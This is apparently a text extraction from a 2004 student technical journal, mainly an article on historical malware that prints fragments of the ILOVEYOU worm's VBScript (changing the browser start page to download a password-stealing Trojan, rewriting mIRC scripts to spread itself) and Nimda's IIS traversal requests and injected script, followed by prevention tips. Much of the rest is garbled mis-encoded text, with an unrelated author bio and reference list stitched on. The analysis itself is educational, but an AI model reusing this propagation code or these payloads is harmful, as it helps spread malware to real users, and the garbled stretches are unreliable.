num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 24: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

